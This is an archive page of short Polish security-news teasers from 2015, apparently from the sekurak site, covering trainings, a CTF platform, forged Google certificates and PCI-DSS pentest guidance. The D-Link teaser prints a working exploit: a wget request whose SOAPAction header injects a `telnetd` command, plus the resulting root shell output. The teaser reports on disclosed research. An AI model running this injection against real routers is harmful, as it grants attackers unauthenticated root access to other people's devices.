Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Aktualności

Kolejna edycja zaawansowanego szkolenia Mario Heiderich-a

28 maja 2015, 10:39 | W biegu | 0 komentarzy

Niedługo (22-23.06.2015) rusza w Krakowie druga edycja szkolenia: Offensive HTML, SVG, CSS and other Browser-Evil. O samym szkoleniu już pisaliśmy jakiś czas temu przy okazji pierwszej edycji tego kursu. Warto tu przypomnieć, że całość prowadzi światowej renomy badacz bezpieczeństwa – Mario Heiderich. A podsumowując – jest to propozycja przeznaczona dla…

Czytaj dalej »

Fakty i Mity Defensywnych aspektów Bezpieczeństwa Informacji: część I

28 maja 2015, 10:16 | Aktualności, Teksty | komentarze 4
Fakty i Mity Defensywnych aspektów Bezpieczeństwa Informacji: część I

Poniższy artykuł nie jest bardzo techniczny, ani teoretyczny – w zamian tego jest praktyczny. Uznałem, że może być ciekawym wprowadzeniem dla interesujących się obroną informacji lub osób, które jeszcze nie próbowały tej strony „mocy„. Jeśli jeszcze nie wiesz czy to artykuł dla Ciebie to zainwestuj kilka minut na przeczytanie go, a…

Czytaj dalej »

Nowe D-Linki – nowy sposób na zdobycie roota bez uwierzytelnienia

11 kwietnia 2015, 12:40 | W biegu | 1 komentarz

Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…

Czytaj dalej »

rozwal.to – ostatnie dni systemu beta

08 kwietnia 2015, 13:04 | W biegu | komentarze 4

W naszej platformie hackme / CTF – rozwal.to – mamy już niemal wszystko: domenę, logo, grafikę, 40 pierwszych flag do zdobycia i prawie 80 użytkowników którzy obecnie biorą udział w betatestach. Obecnie cięte są grafiki a w przyszłym tygodniu będą integrowane w platformę. Za około 3 tygodnie możecie się więc…

Czytaj dalej »

Hackowanie bankomatu… łomem i młotem

08 kwietnia 2015, 12:51 | W biegu | komentarze 2

Brian Krebs opisuje ciekawy przypadek 'hackowania’ bankomatu. Mimo że fizyczne ataki na tego typu urządzenia nie są niczym nowym, to jednak profesjonalni przestępcy zazwyczaj robią to bardziej wyrafinowanymi narzędziami (jak choćby palnikami). Tym razem jednak użyto tradycyjnego brute force z wykorzystaniem narzędzi typu łom czy młot:   Koszt zniszczeń samych…

Czytaj dalej »

Prezentacja sekuraka na Twoim spotkaniu

07 kwietnia 2015, 11:20 | W biegu | 0 komentarzy

W ostatnim czasie reaktywowaliśmy nasze prezentacje na polskich konferencjach i spotkaniach: koniec zeszłego roku – Secure (prezentacja dostała #1 miejsce za merytorykę, wyprzedzając nawet Mikko Hypponen-a – choć bez ściemy: sami nie czujemy się mocniejsi merytorycznie niż Mikko), niedawna prezentacja na poznańskim Ptaq, oraz tegorocznym Semaforze.  Będziemy też niedługo z…

Czytaj dalej »

Google blokuje w Chrome chińskie root CA

02 kwietnia 2015, 15:22 | W biegu | 1 komentarz

Ostatnio pisaliśmy o unieważnieniu certyfikatów SSL firmy MCS Holding. Przypominam – chodziło o podstawianie certyfikatów, aby podszyć się pod domeny Google (bez komunikatów o błędach w przeglądarce). Teraz Google idzie dalej i usunie w Chrome certyfikat root CA organizacji CNNIC – ze zbioru certyfikatów zaufanych (organizacja ta wydała „feralny” certyfikat…

Czytaj dalej »

PCI-DSS – nowy dokument dotyczący testów penetracyjnych

02 kwietnia 2015, 11:24 | W biegu | 0 komentarzy

Około roku temu ukazała się wersja trzecia standardu PCI-DSS (w skrócie: standard bezpieczeństwa narzucany firmom obsługującym karty płatnicze). Teraz został opublikowany dość szczegółowy dokument opisujący jak powinny wyglądać testy penetracyjne, które opisane są w samym standardzie. Dokładnie chodzi tutaj o wymaganie 11.3: Na czerwono zaznaczyłem przy okazji informację, która mówi…

Czytaj dalej »

rozwal.to – layout beta

30 marca 2015, 13:31 | W biegu | 1 komentarz

Nasza platforma CTF/hackme jest już rozwijana w trybie beta od dłuższego czasu (można poprosić jeszcze o dostęp). Dzisiaj mamy już wersję beta grafiki. Niedługo całość dostępna będzie dla wszystkich :-) –ms

Czytaj dalej »

Szkolenie CEH oraz Offensive HTML – już wkrótce

24 marca 2015, 12:10 | W biegu | 0 komentarzy

Zapraszamy na dwa mocno techniczne szkolenia organizowane przez Securitum: Warsztatowy kurs przygotowujący do CEHv8 (Certified Ethical Hacker) – (Warszawa, 13-17 kwietnia 2015). Mamy tutaj 5 dni dosłownie po brzegi wypełnione ćwiczeniami, a opinie odnośnie kursu też są całkiem dobre (reszta na stronie szkolenia): Szkolenie przygotowujące do egzaminu CEH prowadzone przez…

Czytaj dalej »

Podrobione certyfikaty dla domen Google – zamieszane… Chiny

24 marca 2015, 10:31 | W biegu | 1 komentarz

Google security blog informuje o wykryciu podrobionych (ale akceptowanych przez przeglądarki jako zaufane) certyfikatów dla kilku domen będących w posiadaniu Google. Certyfikaty zostały wystawione przez pośrednie CA (intermediate CA) – firmy MCS Holding, która otrzymała swój certyfikat od root CA chińskiej organizacji CNNIC. Root CA CNNIC jest w domyślnym cert…

Czytaj dalej »